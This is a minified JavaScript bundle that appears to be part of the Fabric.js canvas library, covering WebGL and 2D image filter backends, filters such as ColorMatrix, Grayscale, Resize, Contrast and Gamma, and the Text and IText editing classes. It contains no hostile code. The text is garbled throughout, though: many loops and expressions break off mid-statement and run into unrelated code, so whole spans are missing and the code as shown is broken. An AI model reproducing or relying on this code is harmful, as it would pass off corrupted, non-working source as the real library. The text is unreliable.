C=E.targetCanvas,y=E.destinationWidth,A=E.destinationHeight;(C.width!==y||C.height!==A)&&(C.width=y,C.height=A)}(S),this.copyGLTo2D(w,S),w.bindTexture(w.TEXTURE_2D,null),w.deleteTexture(S.sourceTexture),w.deleteTexture(S.targetTexture),w.deleteFramebuffer(O),p.getContext("2d").setTransform(1,0,0,1,0,0),S},dispose:function(){this.canvas&&(this.canvas=null,this.gl=null),this.clearWebGLCaches()},clearWebGLCaches:function(){this.programCache={},this.textureCache={}},createTexture:function(b,_,y,A){var p=b.createTexture();return b.bindTexture(b.TEXTURE_2D,p),b.texParameteri(b.TEXTURE_2D,b.TEXTURE_MAG_FILTER,b.NEAREST),b.texParameteri(b.TEXTURE_2D,b.TEXTURE_MIN_FILTER,b.NEAREST),b.texParameteri(b.TEXTURE_2D,b.TEXTURE_WRAP_S,b.CLAMP_TO_EDGE),b.texParameteri(b.TEXTURE_2D,b.TEXTURE_WRAP_T,b.CLAMP_TO_EDGE),A?b.texImage2D(b.TEXTURE_2D,0,b.RGBA,b.RGBA,b.UNSIGNED_BYTE,A):b.texImage2D(b.TEXTURE_2D,0,b.RGBA,_,y,0,b.RGBA,b.UNSIGNED_BYTE,null),p},getCachedTexture:function(b,_){if(this.textureCache[b])return this.textureCache[b];var y=this.createTexture(this.gl,_.width,_.height,_);return this.textureCache[b]=y,y},evictCachesForKey:function(b){this.textureCache[b]&&(this.gl.deleteTexture(this.textureCache[b]),delete this.textureCache[b])},copyGLTo2D:$,captureGPUInfo:function(){if(this.gpuInfo)return this.gpuInfo;var b=this.gl,_={renderer:"",vendor:""};if(!b)return _;var y=b.getExtension("WEBGL_debug_renderer_info");if(y){var A=b.getParameter(y.UNMASKED_RENDERER_WEBGL),p=b.getParameter(y.UNMASKED_VENDOR_WEBGL);A&&(_.renderer=A.toLowerCase()),p&&(_.vendor=p.toLowerCase())}return this.gpuInfo=_,_}}}(),function(){"use strict";var E=function(){};function C(){}j.Canvas2dFilterBackend=C,C.prototype={evictCachesForKey:E,dispose:E,clearWebGLCaches:E,resources:{},applyFilters:function(b,_,y,A,p){var D=p.getContext("2d");D.drawImage(_,0,0,y,A);var S={sourceWidth:y,sourceHeight:A,imageData:D.getImageData(0,0,y,A),originalEl:_,originalImageData:D.getImageData(0,0,y,A),canvasEl:p,ctx:D,filterBackend:this};return b.forEach(function(O){O.applyTo(S)}),(S.imageData.width!==y||S.imageData.height!==A)&&(p.width=S.imageData.width,p.height=S.imageData.height),D.putImageData(S.imageData,0,0),S}}}(),j.Image=j.Image||{},j.Image.filters=j.Image.filters||{},j.Image.filters.BaseFilter=j.util.createClass({type:"BaseFilter",vertexSource:"attribute vec2 aPosition;\nvarying vec2 vTexCoord;\nvoid main() {\nvTexCoord = aPosition;\ngl_Position = vec4(aPosition * 2.0 - 1.0, 0.0, 1.0);\n}",fragmentSource:"precision highp float;\nvarying vec2 vTexCoord;\nuniform sampler2D uTexture;\nvoid main() {\ngl_FragColor = texture2D(uTexture, vTexCoord);\n}",initialize:function(E){E&&this.setOptions(E)},setOptions:function(E){for(var C in E)this[C]=E[C]},createProgram:function(E,C,b){C=C||this.fragmentSource,b=b||this.vertexSource,"highp"!==j.webGlPrecision&&(C=C.replace(/precision highp float/g,"precision "+j.webGlPrecision+" float"));var _=E.createShader(E.VERTEX_SHADER);if(E.shaderSource(_,b),E.compileShader(_),!E.getShaderParameter(_,E.COMPILE_STATUS))throw new Error("Vertex shader compile error for "+this.type+": "+E.getShaderInfoLog(_));var y=E.createShader(E.FRAGMENT_SHADER);if(E.shaderSource(y,C),E.compileShader(y),!E.getShaderParameter(y,E.COMPILE_STATUS))throw new Error("Fragment shader compile error for "+this.type+": "+E.getShaderInfoLog(y));var A=E.createProgram();if(E.attachShader(A,_),E.attachShader(A,y),E.linkProgram(A),!E.getProgramParameter(A,E.LINK_STATUS))throw new Error('Shader link error for "${this.type}" '+E.getProgramInfoLog(A));var p=this.getAttributeLocations(E,A),D=this.getUniformLocations(E,A)||{};return D.uStepW=E.getUniformLocation(A,"uStepW"),D.uStepH=E.getUniformLocation(A,"uStepH"),{program:A,attributeLocations:p,uniformLocations:D}},getAttributeLocations:function(E,C){return{aPosition:E.getAttribLocation(C,"aPosition")}},getUniformLocations:function(){return{}},sendAttributeData:function(E,C,b){var _=C.aPosition,y=E.createBuffer();E.bindBuffer(E.ARRAY_BUFFER,y),E.enableVertexAttribArray(_),E.vertexAttribPointer(_,2,E.FLOAT,!1,0,0),E.bufferData(E.ARRAY_BUFFER,b,E.STATIC_DRAW)},_setupFrameBuffer:function(E){var b,_,C=E.context;E.passes>1?(_=E.destinationHeight,(E.sourceWidth!==(b=E.destinationWidth)||E.sourceHeight!==_)&&(C.deleteTexture(E.targetTexture),E.targetTexture=E.filterBackend.createTexture(C,b,_)),C.framebufferTexture2D(C.FRAMEBUFFER,C.COLOR_ATTACHMENT0,C.TEXTURE_2D,E.targetTexture,0)):(C.bindFramebuffer(C.FRAMEBUFFER,null),C.finish())},_swapTextures:function(E){E.passes--,E.pass++;var C=E.targetTexture;E.targetTexture=E.sourceTexture,E.sourceTexture=C},isNeutralState:function(){var E=this.mainParameter,C=j.Image.filters[this.type].prototype;if(E){if(Array.isArray(C[E])){for(var b=C[E].length;b--;)if(this[E][b]!==C[E][b])return!1;return!0}return C[E]===this[E]}return!1},applyTo:function(E){E.webgl?(this._setupFrameBuffer(E),this.applyToWebGL(E),this._swapTextures(E)):this.applyTo2d(E)},retrieveShader:function(E){return E.programCache.hasOwnProperty(this.type)||(E.programCache[this.type]=this.createProgram(E.context)),E.programCache[this.type]},applyToWebGL:function(E){var C=E.context,b=this.retrieveShader(E);C.bindTexture(C.TEXTURE_2D,0===E.pass&&E.originalTexture?E.originalTexture:E.sourceTexture),C.useProgram(b.program),this.sendAttributeData(C,b.attributeLocations,E.aPosition),C.uniform1f(b.uniformLocations.uStepW,1/E.sourceWidth),C.uniform1f(b.uniformLocations.uStepH,1/E.sourceHeight),this.sendUniformData(C,b.uniformLocations),C.viewport(0,0,E.destinationWidth,E.destinationHeight),C.drawArrays(C.TRIANGLE_STRIP,0,4)},bindAdditionalTexture:function(E,C,b){E.activeTexture(b),E.bindTexture(E.TEXTURE_2D,C),E.activeTexture(E.TEXTURE0)},unbindAdditionalTexture:function(E,C){E.activeTexture(C),E.bindTexture(E.TEXTURE_2D,null),E.activeTexture(E.TEXTURE0)},getMainParameter:function(){return this[this.mainParameter]},setMainParameter:function(E){this[this.mainParameter]=E},sendUniformData:function(){},createHelpLayer:function(E){if(!E.helpLayer){var C=document.createElement("canvas");C.width=E.sourceWidth,C.height=E.sourceHeight,E.helpLayer=C}},toObject:function(){var E={type:this.type},C=this.mainParameter;return C&&(E[C]=this[C]),E},toJSON:function(){return this.toObject()}}),j.Image.filters.BaseFilter.fromObject=function(E,C){var b=new j.Image.filters[E.type](E);return C&&C(b),b},function(E){"use strict";var C=E.fabric||(E.fabric={}),b=C.Image.filters;b.ColorMatrix=(0,C.util.createClass)(b.BaseFilter,{type:"ColorMatrix",fragmentSource:"precision highp float;\nuniform sampler2D uTexture;\nvarying vec2 vTexCoord;\nuniform mat4 uColorMatrix;\nuniform vec4 uConstants;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\ncolor *= uColorMatrix;\ncolor += uConstants;\ngl_FragColor = color;\n}",matrix:[1,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,1,0],mainParameter:"matrix",colorsOnly:!0,initialize:function(y){this.callSuper("initialize",y),this.matrix=this.matrix.slice(0)},applyTo2d:function(y){var x,S,O,B,K,p=y.imageData.data,D=p.length,w=this.matrix,ee=this.colorsOnly;for(K=0;K=B||f<0||f>=O)&&(ve+=D[M=4*(v*O+f)]*(P=w[h*x+L]),le+=D[M+1]*P,ye+=D[M+2]*P,se||(z+=D[M+3]*P));ee[l]=ve,ee[l+1]=le,ee[l+2]=ye,ee[l+3]=se?D[l+3]:z}A.imageData=K},getUniformLocations:function(A,p){return{uMatrix:A.getUniformLocation(p,"uMatrix"),uOpaque:A.getUniformLocation(p,"uOpaque"),uHalfSize:A.getUniformLocation(p,"uHalfSize"),uSize:A.getUniformLocation(p,"uSize")}},sendUniformData:function(A,p){A.uniform1fv(p.uMatrix,this.matrix)},toObject:function(){return b(this.callSuper("toObject"),{opaque:this.opaque,matrix:this.matrix})}}),C.Image.filters.Convolute.fromObject=C.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var C=E.fabric||(E.fabric={}),b=C.Image.filters;b.Grayscale=(0,C.util.createClass)(b.BaseFilter,{type:"Grayscale",fragmentSource:{average:"precision highp float;\nuniform sampler2D uTexture;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\nfloat average = (color.r + color.b + color.g) / 3.0;\ngl_FragColor = vec4(average, average, average, color.a);\n}",lightness:"precision highp float;\nuniform sampler2D uTexture;\nuniform int uMode;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 col = texture2D(uTexture, vTexCoord);\nfloat average = (max(max(col.r, col.g),col.b) + min(min(col.r, col.g),col.b)) / 2.0;\ngl_FragColor = vec4(average, average, average, col.a);\n}",luminosity:"precision highp float;\nuniform sampler2D uTexture;\nuniform int uMode;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 col = texture2D(uTexture, vTexCoord);\nfloat average = 0.21 * col.r + 0.72 * col.g + 0.07 * col.b;\ngl_FragColor = vec4(average, average, average, col.a);\n}"},mode:"average",mainParameter:"mode",applyTo2d:function(y){var D,x,p=y.imageData.data,w=p.length,S=this.mode;for(D=0;Dee[0]&&O>ee[1]&&B>ee[2]&&S 0.0) {\n"+this.fragmentSource[y]+"}\n}"},retrieveShader:function(y){var p,A=this.type+"_"+this.mode;return y.programCache.hasOwnProperty(A)||(p=this.buildSource(this.mode),y.programCache[A]=this.createProgram(y.context,p)),y.programCache[A]},applyTo2d:function(y){var w,x,S,O,B,K,ee,p=y.imageData.data,D=p.length,se=1-this.alpha;w=(ee=new C.Color(this.color).getSource())[0]*this.alpha,x=ee[1]*this.alpha,S=ee[2]*this.alpha;for(var ve=0;ve=O||B<=-O)return 0;if(B<1.1920929e-7&&B>-1.1920929e-7)return 1;var K=(B*=Math.PI)/O;return D(B)/B*D(K)/K}},applyTo2d:function(O){var B=O.imageData,K=this.scaleX,ee=this.scaleY;this.rcpScaleX=1/K,this.rcpScaleY=1/ee;var z,se=B.width,ve=B.height,le=p(se*K),ye=p(ve*ee);"sliceHack"===this.resizeType?z=this.sliceByTwo(O,se,ve,le,ye):"hermite"===this.resizeType?z=this.hermiteFastResize(O,se,ve,le,ye):"bilinear"===this.resizeType?z=this.bilinearFiltering(O,se,ve,le,ye):"lanczos"===this.resizeType&&(z=this.lanczosResize(O,se,ve,le,ye)),O.imageData=z},sliceByTwo:function(O,B,K,ee,se){var M,P,ve=O.imageData,ye=!1,z=!1,l=.5*B,f=.5*K,v=C.filterBackend.resources,G=0,X=0,L=B,h=0;for(v.sliceByTwo||(v.sliceByTwo=document.createElement("canvas")),((M=v.sliceByTwo).width<1.5*B||M.height=B)){De=_(1e3*A(ue-h.x)),L[De]||(L[De]={});for(var ze=R.y-X;ze<=R.y+X;ze++)ze<0||ze>=K||(Ve=_(1e3*A(ze-h.y)),L[De][Ve]||(L[De][Ve]=l(y(b(De*M,2)+b(Ve*P,2))/1e3)),(Ie=L[De][Ve])>0&&(Ue+=Ie,Xe+=Ie*le[Ae=4*(ze*B+ue)],He+=Ie*le[Ae+1],Be+=Ie*le[Ae+2],qe+=Ie*le[Ae+3]))}z[Ae=4*(Z*ee+J)]=Xe/Ue,z[Ae+1]=He/Ue,z[Ae+2]=Be/Ue,z[Ae+3]=qe/Ue}return++J1&&Ve<-1||(L=2*Ve*Ve*Ve-3*Ve*Ve+1)>0&&(Ie+=L*f[3+(De=4*(qe+Ue*B))],R+=L,f[De+3]<255&&(L=L*f[De+3]/250),J+=L*f[De],Z+=L*f[De+1],ue+=L*f[De+2],h+=L)}M[X]=J/h,M[X+1]=Z/h,M[X+2]=ue/h,M[X+3]=Ie/R}return v},toObject:function(){return{type:this.type,scaleX:this.scaleX,scaleY:this.scaleY,resizeType:this.resizeType,lanczosLobes:this.lanczosLobes}}}),C.Image.filters.Resize.fromObject=C.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var C=E.fabric||(E.fabric={}),b=C.Image.filters;b.Contrast=(0,C.util.createClass)(b.BaseFilter,{type:"Contrast",fragmentSource:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uContrast;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\nfloat contrastF = 1.015 * (uContrast + 1.0) / (1.0 * (1.015 - uContrast));\ncolor.rgb = contrastF * (color.rgb - 0.5) + 0.5;\ngl_FragColor = color;\n}",contrast:0,mainParameter:"contrast",applyTo2d:function(y){if(0!==this.contrast){var p,D=y.imageData.data,w=D.length,x=Math.floor(255*this.contrast),S=259*(x+255)/(255*(259-x));for(p=0;p1&&(y=1/this.aspectRatio):this.aspectRatio<1&&(y=this.aspectRatio),p=y*this.blur*.12,this.horizontal?A[0]=p:A[1]=p,A}}),b.Blur.fromObject=C.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var C=E.fabric||(E.fabric={}),b=C.Image.filters;b.Gamma=(0,C.util.createClass)(b.BaseFilter,{type:"Gamma",fragmentSource:"precision highp float;\nuniform sampler2D uTexture;\nuniform vec3 uGamma;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\nvec3 correction = (1.0 / uGamma);\ncolor.r = pow(color.r, correction.r);\ncolor.g = pow(color.g, correction.g);\ncolor.b = pow(color.b, correction.b);\ngl_FragColor = color;\ngl_FragColor.rgb *= color.a;\n}",gamma:[1,1,1],mainParameter:"gamma",initialize:function(y){this.gamma=[1,1,1],b.BaseFilter.prototype.initialize.call(this,y)},applyTo2d:function(y){var B,p=y.imageData.data,D=this.gamma,w=p.length,x=1/D[0],S=1/D[1],O=1/D[2];for(this.rVals||(this.rVals=new Uint8Array(256),this.gVals=new Uint8Array(256),this.bVals=new Uint8Array(256)),B=0,w=256;B'},_getCacheCanvasDimensions:function(){var y=this.callSuper("_getCacheCanvasDimensions"),A=this.fontSize;return y.width+=A*y.zoomX,y.height+=A*y.zoomY,y},_render:function(y){var A=this.path;A&&!A.isNotVisible()&&A._render(y),this._setTextStyles(y),this._renderTextLinesBackground(y),this._renderTextDecoration(y,"underline"),this._renderText(y),this._renderTextDecoration(y,"overline"),this._renderTextDecoration(y,"linethrough")},_renderText:function(y){"stroke"===this.paintFirst?(this._renderTextStroke(y),this._renderTextFill(y)):(this._renderTextFill(y),this._renderTextStroke(y))},_setTextStyles:function(y,A,p){if(y.textBaseline="alphabetical",this.path)switch(this.pathAlign){case"center":y.textBaseline="middle";break;case"ascender":y.textBaseline="top";break;case"descender":y.textBaseline="bottom"}y.font=this._getFontDeclaration(A,p)},calcTextWidth:function(){for(var y=this.getLineWidth(0),A=1,p=this._textLines.length;Ay&&(y=D)}return y},_renderTextLine:function(y,A,p,D,w,x){this._renderChars(y,A,p,D,w,x)},_renderTextLinesBackground:function(y){if(this.textBackgroundColor||this.styleHas("textBackgroundColor")){for(var A,p,w,x,ee,se,le,D=y.fillStyle,S=this._getLeftOffset(),O=this._getTopOffset(),B=0,K=0,ve=this.path,ye=0,z=this._textLines.length;ye=0:pse?K%=se:K<0&&(K+=se),this._setGraphemeOnPath(K,S=B[p],ee),K+=S.kernedWidth}return{width:A,numOfSpaces:0}},_setGraphemeOnPath:function(y,A,p){var w=this.path,x=C.util.getPointOnPath(w.path,y+A.kernedWidth/2,w.segmentsInfo);A.renderLeft=x.x-p.x,A.renderTop=x.y-p.y,A.angle=x.angle+("right"===this.pathSide?Math.PI:0)},_getGraphemeBox:function(y,A,p,D,w){var ee,x=this.getCompleteStyleDeclaration(A,p),S=D?this.getCompleteStyleDeclaration(A,p-1):{},O=this._measureChar(y,x,D,S),B=O.kernedWidth,K=O.width;0!==this.charSpacing&&(K+=ee=this._getWidthOfCharSpacing(),B+=ee);var se={width:K,left:0,height:x.fontSize,kernedWidth:B,deltaY:x.deltaY};if(p>0&&!w){var ve=this.__charBounds[A][p-1];se.left=ve.left+ve.width+O.kernedWidth-O.width}return se},getHeightOfLine:function(y){if(this.__lineHeights[y])return this.__lineHeights[y];for(var A=this._textLines[y],p=this.getHeightOfChar(y,0),D=1,w=A.length;D0){var Z=ee+x+le;"rtl"===this.direction&&(Z=this.width-Z-ye),K&&M&&(y.fillStyle=M,y.fillRect(Z,ve+X*D+S,ye,this.fontSize/15)),le=z.left,ye=z.width,K=l,M=v,D=w,S=O}else ye+=z.kernedWidth;Z=ee+x+le,"rtl"===this.direction&&(Z=this.width-Z-ye),y.fillStyle=v,l&&v&&y.fillRect(Z,ve+X*D+S,ye-G,this.fontSize/15),se+=p}else se+=p;this._removeShadow(y)}},_getFontDeclaration:function(y,A){var p=y||this,D=this.fontFamily,w=C.Text.genericFonts.indexOf(D.toLowerCase())>-1,x=void 0===D||D.indexOf("'")>-1||D.indexOf(",")>-1||D.indexOf('"')>-1||w?p.fontFamily:'"'+p.fontFamily+'"';return[C.isLikelyNode?p.fontWeight:p.fontStyle,C.isLikelyNode?p.fontStyle:p.fontWeight,A?this.CACHE_FONT_SIZE+"px":p.fontSize+"px",x].join(" ")},render:function(y){!this.visible||this.canvas&&this.canvas.skipOffscreen&&!this.group&&!this.isOnScreen()||(this._shouldClearDimensionCache()&&this.initDimensions(),this.callSuper("render",y))},_splitTextIntoLines:function(y){for(var A=y.split(this._reNewline),p=new Array(A.length),D=["\n"],w=[],x=0;x-1&&(C.underline=!0),C.textDecoration.indexOf("line-through")>-1&&(C.linethrough=!0),C.textDecoration.indexOf("overline")>-1&&(C.overline=!0),delete C.textDecoration)}j.IText=j.util.createClass(j.Text,j.Observable,{type:"i-text",selectionStart:0,selectionEnd:0,selectionColor:"rgba(17,119,255,0.3)",isEditing:!1,editable:!0,editingBorderColor:"rgba(102,153,255,0.25)",cursorWidth:2,cursorColor:"",cursorDelay:1e3,cursorDuration:600,caching:!0,hiddenTextareaContainer:null,_reSpace:/\s|\n/,_currentCursorOpacity:0,_selectionDirection:null,_abortCursorAnimation:!1,__widthOfSpace:[],inCompositionMode:!1,initialize:function(C,b){this.callSuper("initialize",C,b),this.initBehavior()},setSelectionStart:function(C){C=Math.max(C,0),this._updateAndFire("selectionStart",C)},setSelectionEnd:function(C){C=Math.min(C,this.text.length),this._updateAndFire("selectionEnd",C)},_updateAndFire:function(C,b){this[C]!==b&&(this._fireSelectionChanged(),this[C]=b),this._updateTextarea()},_fireSelectionChanged:function(){this.fire("selection:changed"),this.canvas&&this.canvas.fire("text:selection:changed",{target:this})},initDimensions:function(){this.isEditing&&this.initDelayedCursor(),this.clearContextTop(),this.callSuper("initDimensions")},render:function(C){this.clearContextTop(),this.callSuper("render",C),this.cursorOffsetCache={},this.renderCursorOrSelection()},_render:function(C){this.callSuper("_render",C)},clearContextTop:function(C){if(this.isEditing&&this.canvas&&this.canvas.contextTop){var b=this.canvas.contextTop,_=this.canvas.viewportTransform;b.save(),b.transform(_[0],_[1],_[2],_[3],_[4],_[5]),this.transform(b),this._clearTextArea(b),C||b.restore()}},renderCursorOrSelection:function(){if(this.isEditing&&this.canvas&&this.canvas.contextTop){var C=this._getCursorBoundaries(),b=this.canvas.contextTop;this.clearContextTop(!0),this.selectionStart===this.selectionEnd?this.renderCursor(C,b):this.renderSelection(C,b),b.restore()}},_clearTextArea:function(C){var b=this.width+4,_=this.height+4;C.clearRect(-b/2,-_/2,b,_)},_getCursorBoundaries:function(C){void 0===C&&(C=this.selectionStart);var b=this._getLeftOffset(),_=this._getTopOffset(),y=this._getCursorBoundariesOffsets(C);return{left:b,top:_,leftOffset:y.left,topOffset:y.top}},_getCursorBoundariesOffsets:function(C){if(this.cursorOffsetCache&&"top"in this.cursorOffsetCache)return this.cursorOffsetCache;var b,_,y,D,A=0,p=0,w=this.get2DCursorLocation(C);y=w.charIndex,_=w.lineIndex;for(var x=0;x<_;x++)A+=this.getHeightOfLine(x);b=this._getLineLeftOffset(_);var S=this.__charBounds[_][y];return S&&(p=S.left),0!==this.charSpacing&&y===this._textLines[_].length&&(p-=this._getWidthOfCharSpacing()),D={top:A,left:b+(p>0?p:0)},"rtl"===this.direction&&(D.left*=-1),this.cursorOffsetCache=D,this.cursorOffsetCache},renderCursor:function(C,b){var _=this.get2DCursorLocation(),y=_.lineIndex,A=_.charIndex>0?_.charIndex-1:0,p=this.getValueOfPropertyAt(y,A,"fontSize"),D=this.scaleX*this.canvas.getZoom(),w=this.cursorWidth/D,x=C.topOffset,S=this.getValueOfPropertyAt(y,A,"deltaY");x+=(1-this._fontSizeFraction)*this.getHeightOfLine(y)/this.lineHeight-p*(1-this._fontSizeFraction),this.inCompositionMode&&this.renderSelection(C,b),b.fillStyle=this.cursorColor||this.getValueOfPropertyAt(y,A,"fill"),b.globalAlpha=this.__isMousedown?1:this._currentCursorOpacity,b.fillRect(C.left+C.leftOffset-w/2,x+C.top+S,w,p)},renderSelection:function(C,b){for(var _=this.inCompositionMode?this.hiddenTextarea.selectionStart:this.selectionStart,y=this.inCompositionMode?this.hiddenTextarea.selectionEnd:this.selectionEnd,A=-1!==this.textAlign.indexOf("justify"),p=this.get2DCursorLocation(_),D=this.get2DCursorLocation(y),w=p.lineIndex,x=D.lineIndex,S=p.charIndex<0?0:p.charIndex,O=D.charIndex<0?0:D.charIndex,B=w;B<=x;B++){var se,K=this._getLineLeftOffset(B)||0,ee=this.getHeightOfLine(B),ve=0,le=0;if(B===w&&(ve=this.__charBounds[w][S].left),B>=w&&B1)&&(ee/=this.lineHeight);var z=C.left+K+ve,l=le-ve,f=ee,v=0;this.inCompositionMode?(b.fillStyle=this.compositionColor||"black",f=1,v=ee):b.fillStyle=this.selectionColor,"rtl"===this.direction&&(z=this.width-z-l),b.fillRect(z,C.top+C.topOffset+v,l,f),C.topOffset+=se}},getCurrentCharFontSize:function(){var C=this._getCurrentCharIndex();return this.getValueOfPropertyAt(C.l,C.c,"fontSize")},getCurrentCharColor:function(){var C=this._getCurrentCharIndex();return this.getValueOfPropertyAt(C.l,C.c,"fill")},_getCurrentCharIndex:function(){var C=this.get2DCursorLocation(this.selectionStart,!0);return{l:C.lineIndex,c:C.charIndex>0?C.charIndex-1:0}}}),j.IText.fromObject=function(C,b){var _=j.util.stylesFromArray(C.styles,C.text),y=Object.assign({},C,{styles:_});if(E(y),y.styles)for(var A in y.styles)for(var p in y.styles[A])E(y.styles[A][p]);j.Object._fromObject("IText",y,b,"text")}}(),function(){var E=j.util.object.clone;j.util.object.extend(j.IText.prototype,{initBehavior:function(){this.initAddedHandler(),this.initRemovedHandler(),this.initCursorSelectionHandlers(),this.initDoubleClickSimulation(),this.mouseMoveHandler=this.mouseMoveHandler.bind(this)},onDeselect:function(){this.isEditing&&this.exitEditing(),this.selected=!1},initAddedHandler:function(){var C=this;this.on("added",function(){var b=C.canvas;b&&(b._hasITextHandlers||(b._hasITextHandlers=!0,C._initCanvasHandlers(b)),b._iTextInstances=b._iTextInstances||[],b._iTextInstances.push(C))})},initRemovedHandler:function(){var C=this;this.on("removed",function(){var b=C.canvas;b&&(b._iTextInstances=b._iTextInstances||[],j.util.removeFromArray(b._iTextInstances,C),0===b._iTextInstances.length&&(b._hasITextHandlers=!1,C._removeCanvasHandlers(b)))})},_initCanvasHandlers:function(C){C._mouseUpITextHandler=function(){C._iTextInstances&&C._iTextInstances.forEach(function(b){b.__isMousedown=!1})},C.on("mouse:up",C._mouseUpITextHandler)},_removeCanvasHandlers:function(C){C.off("mouse:up",C._mouseUpITextHandler)},_tick:function(){this._currentTickState=this._animateCursor(this,1,this.cursorDuration,"_onTickComplete")},_animateCursor:function(C,b,_,y){var A;return A={isAborted:!1,abort:function(){this.isAborted=!0}},C.animate("_currentCursorOpacity",b,{duration:_,onComplete:function(){A.isAborted||C[y]()},onChange:function(){C.canvas&&C.selectionStart===C.selectionEnd&&C.renderCursorOrSelection()},abort:function(){return A.isAborted}}),A},_onTickComplete:function(){var C=this;this._cursorTimeout1&&clearTimeout(this._cursorTimeout1),this._cursorTimeout1=setTimeout(function(){C._currentTickCompleteState=C._animateCursor(C,0,this.cursorDuration/2,"_tick")},100)},initDelayedCursor:function(C){var b=this,_=C?0:this.cursorDelay;this.abortCursorAnimation(),this._currentCursorOpacity=1,this._cursorTimeout2=setTimeout(function(){b._tick()},_)},abortCursorAnimation:function(){var C=this._currentTickState||this._currentTickCompleteState,b=this.canvas;this._currentTickState&&this._currentTickState.abort(),this._currentTickCompleteState&&this._currentTickCompleteState.abort(),clearTimeout(this._cursorTimeout1),clearTimeout(this._cursorTimeout2),this._currentCursorOpacity=0,C&&b&&b.clearContext(b.contextTop||b.contextContainer)},selectAll:function(){return this.selectionStart=0,this.selectionEnd=this._text.length,this._fireSelectionChanged(),this._updateTextarea(),this},getSelectedText:function(){return this._text.slice(this.selectionStart,this.selectionEnd).join("")},findWordBoundaryLeft:function(C){var b=0,_=C-1;if(this._reSpace.test(this._text[_]))for(;this._reSpace.test(this._text[_]);)b++,_--;for(;/\S/.test(this._text[_])&&_>-1;)b++,_--;return C-b},findWordBoundaryRight:function(C){var b=0,_=C;if(this._reSpace.test(this._text[_]))for(;this._reSpace.test(this._text[_]);)b++,_++;for(;/\S/.test(this._text[_])&&_-1;)b++,_--;return C-b},findLineBoundaryRight:function(C){for(var b=0,_=C;!/\n/.test(this._text[_])&&_0&&y<_.length;)A=_[y+=b];return p.test(A)&&(y+=1===b?0:1),y},selectWord:function(C){var b=this.searchWordBoundary(C=C||this.selectionStart,-1),_=this.searchWordBoundary(C,1);this.selectionStart=b,this.selectionEnd=_,this._fireSelectionChanged(),this._updateTextarea(),this.renderCursorOrSelection()},selectLine:function(C){var b=this.findLineBoundaryLeft(C=C||this.selectionStart),_=this.findLineBoundaryRight(C);return this.selectionStart=b,this.selectionEnd=_,this._fireSelectionChanged(),this._updateTextarea(),this},enterEditing:function(C){if(!this.isEditing&&this.editable)return this.canvas&&(this.canvas.calcOffset(),this.exitEditingOnOthers(this.canvas)),this.isEditing=!0,this.initHiddenTextarea(C),this.hiddenTextarea.focus(),this.hiddenTextarea.value=this.text,this._updateTextarea(),this._saveEditingProps(),this._setEditingProps(),this._textBeforeEdit=this.text,this._tick(),this.fire("editing:entered"),this._fireSelectionChanged(),this.canvas?(this.canvas.fire("text:editing:entered",{target:this}),this.initMouseMoveHandler(),this.canvas.requestRenderAll(),this):this},exitEditingOnOthers:function(C){C._iTextInstances&&C._iTextInstances.forEach(function(b){b.selected=!1,b.isEditing&&b.exitEditing()})},initMouseMoveHandler:function(){this.canvas.on("mouse:move",this.mouseMoveHandler)},mouseMoveHandler:function(C){if(this.__isMousedown&&this.isEditing){document.activeElement!==this.hiddenTextarea&&this.hiddenTextarea.focus();var b=this.getSelectionStartFromPointer(C.e),_=this.selectionStart,y=this.selectionEnd;(b!==this.__selectionStartOnMouseDown||_===y)&&(_===b||y===b)||(b>this.__selectionStartOnMouseDown?(this.selectionStart=this.__selectionStartOnMouseDown,this.selectionEnd=b):(this.selectionStart=b,this.selectionEnd=this.__selectionStartOnMouseDown),(this.selectionStart!==_||this.selectionEnd!==y)&&(this.restartCursorIfNeeded(),this._fireSelectionChanged(),this._updateTextarea(),this.renderCursorOrSelection()))}},_setEditingProps:function(){this.hoverCursor="text",this.canvas&&(this.canvas.defaultCursor=this.canvas.moveCursor="text"),this.borderColor=this.editingBorderColor,this.hasControls=this.selectable=!1,this.lockMovementX=this.lockMovementY=!0},fromStringToGraphemeSelection:function(C,b,_){var y=_.slice(0,C),A=j.util.string.graphemeSplit(y).length;if(C===b)return{selectionStart:A,selectionEnd:A};var p=_.slice(C,b);return{selectionStart:A,selectionEnd:A+j.util.string.graphemeSplit(p).length}},fromGraphemeToStringSelection:function(C,b,_){var A=_.slice(0,C).join("").length;return C===b?{selectionStart:A,selectionEnd:A}:{selectionStart:A,selectionEnd:A+_.slice(C,b).join("").length}},_updateTextarea:function(){if(this.cursorOffsetCache={},this.hiddenTextarea){if(!this.inCompositionMode){var C=this.fromGraphemeToStringSelection(this.selectionStart,this.selectionEnd,this._text);this.hiddenTextarea.selectionStart=C.selectionStart,this.hiddenTextarea.selectionEnd=C.selectionEnd}this.updateTextareaPosition()}},updateFromTextArea:function(){if(this.hiddenTextarea){this.cursorOffsetCache={},this.text=this.hiddenTextarea.value,this._shouldClearDimensionCache()&&(this.initDimensions(),this.setCoords());var C=this.fromStringToGraphemeSelection(this.hiddenTextarea.selectionStart,this.hiddenTextarea.selectionEnd,this.hiddenTextarea.value);this.selectionEnd=this.selectionStart=C.selectionEnd,this.inCompositionMode||(this.selectionStart=C.selectionStart),this.updateTextareaPosition()}},updateTextareaPosition:function(){if(this.selectionStart===this.selectionEnd){var C=this._calcTextareaPosition();this.hiddenTextarea.style.left=C.left,this.hiddenTextarea.style.top=C.top}},_calcTextareaPosition:function(){if(!this.canvas)return{x:1,y:1};var C=this.inCompositionMode?this.compositionStart:this.selectionStart,b=this._getCursorBoundaries(C),_=this.get2DCursorLocation(C),p=this.getValueOfPropertyAt(_.lineIndex,_.charIndex,"fontSize")*this.lineHeight,D=b.leftOffset,w=this.calcTransformMatrix(),x={x:b.left+D,y:b.top+b.topOffset+p},S=this.canvas.getRetinaScaling(),O=this.canvas.upperCanvasEl,B=O.width/S,K=O.height/S,ee=B-p,se=K-p,ve=O.clientWidth/B,le=O.clientHeight/K;return 